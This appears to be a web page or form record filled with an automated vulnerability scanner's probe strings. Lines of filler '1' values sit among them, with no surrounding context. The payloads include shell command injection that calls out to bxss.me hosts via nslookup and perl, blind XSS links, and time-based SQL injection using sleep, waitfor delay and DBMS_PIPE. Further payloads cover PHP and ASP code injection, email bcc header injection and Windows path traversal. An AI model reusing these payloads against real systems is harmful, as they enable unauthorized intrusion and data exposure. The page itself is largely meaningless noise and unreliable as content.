İ | English
1
1
1
1
1
1
1
1
1
1
1
1
bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
1
1
1
1
HttP://bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
^(#$!@#$)(()))******
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
!(()&&!|*|*|
|(nslookup hitqyelrxxrmg7d71e.bxss.me||perl -e "gethostbyname('hitqyelrxxrmg7d71e.bxss.me')")
1
1
1
1
$(nslookup hitwfpoicwzpc0ab8c.bxss.me||perl -e "gethostbyname('hitwfpoicwzpc0ab8c.bxss.me')")
1
1
&(nslookup hitnxzxupjzqvaf8d1.bxss.me||perl -e "gethostbyname('hitnxzxupjzqvaf8d1.bxss.me')")&'\"`0&(nslookup hitnxzxupjzqvaf8d1.bxss.me||perl -e "gethostbyname('hitnxzxupjzqvaf8d1.bxss.me')")&`'
1
1
1
1
1
1
1
1
1
1
1
`(nslookup hitetxqqhadjl8224f.bxss.me||perl -e "gethostbyname('hitetxqqhadjl8224f.bxss.me')")`
1
1
'"()
1
1
1
1
1
1
echo hayqzf$()\ zcrxvn\nz^xyu||a #' &echo hayqzf$()\ zcrxvn\nz^xyu||a #|" &echo hayqzf$()\ zcrxvn\nz^xyu||a #
1
&echo kdhkel$()\ lrpbba\nz^xyu||a #' &echo kdhkel$()\ lrpbba\nz^xyu||a #|" &echo kdhkel$()\ lrpbba\nz^xyu||a #
"+"A".concat(70-3).concat(22*4).concat(118).concat(77).concat(104).concat(69)+(require"socket" Socket.gethostbyname("hiteq"+"qrrmoioj15b80.bxss.me.")[3].to_s)+"
1
1
1
1
|echo qweapa$()\ seszbo\nz^xyu||a #' |echo qweapa$()\ seszbo\nz^xyu||a #|" |echo qweapa$()\ seszbo\nz^xyu||a #
1
1
'+'A'.concat(70-3).concat(22*4).concat(101).concat(79).concat(110).concat(75)+(require'socket' Socket.gethostbyname('hitvk'+'viyoapboab92f.bxss.me.')[3].to_s)+'
1
1
1
(nslookup hitgfigoguohg1ec9f.bxss.me||perl -e "gethostbyname('hitgfigoguohg1ec9f.bxss.me')")
1
1
1
1
1
1
1
1
1
1
1
1
1
)
1'"()&%
1
1
1
1
1
1
'"()&%
1
1
1
1
${9999277+9999800}
1
1
1
1
1
1
1
1
1 bcc:009247.7253-3858.7253.23a6f.19927.2@bxss.me
1
1
1
1
1
to@example.com> bcc:009247.7253-3859.7253.23a6f.19927.2@bxss.me
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
Production_Save.asp
1
1
1
1
1
1
1
1
1
1
1
1
19046714
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
${@print(md5(31337))}\
1
1
1
1
1
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
1
${@print(md5(31337))}
1
'.print(md5(31337)).'
1
1
1
1
1
1
1
1
1
";print(md5(31337));$a="
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
@@FZN9o
1
1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
1
1
1
1
1
1
1
1'"
1
1
1
1
;(nslookup hittvavddvkqc76df0.bxss.me||perl -e "gethostbyname('hittvavddvkqc76df0.bxss.me')")|(nslookup hittvavddvkqc76df0.bxss.me||perl -e "gethostbyname('hittvavddvkqc76df0.bxss.me')")&(nslookup hittvavddvkqc76df0.bxss.me||perl -e "gethostbyname('hittvavddvkqc76df0.bxss.me')")
1
1
Production_Save.asp
1
1
1
1
1
1
Production_Save.asp/.
1
1
1
1
1
1
1
1
1
1
1
1
-1" OR 2+438-438-1=0+0+0+1 --
-1' OR 2+13-13-1=0+0+0+1 --
-1 OR 2+574-574-1=0+0+0+1
-1 OR 2+607-607-1=0+0+0+1 --
s0V1fFBj
1
1
1
1
if(now()=sysdate(),sleep(15),0)
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
1
1
1
1
1
1
1
1
1
1
8HdAwYVj')); waitfor delay '0:0:15' --
1
1
1
'.gethostbyname(lc('hiter'.'nscrznwq0d232.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(82).chr(99).chr(78).'
1
1
1
".gethostbyname(lc("hitbt"."fsorivhd8c297.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(76).chr(119).chr(80)."
1
1
1
1
1
ZMp5TL1I'); waitfor delay '0:0:15' --
ZSVYYs4S'; waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
1
1
1
1
1
response.write(9664331*9295007)
1
1
'+response.write(9664331*9295007)+'
1
"+response.write(9664331*9295007)+"
1
1
1
1
1
1
1
1
1
1
1
12345'"\'\");|]*
1
1
1
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
1
1
1
1
1
1
1
1
wmjDuVNB
1
1
1
1
1
1
'"
1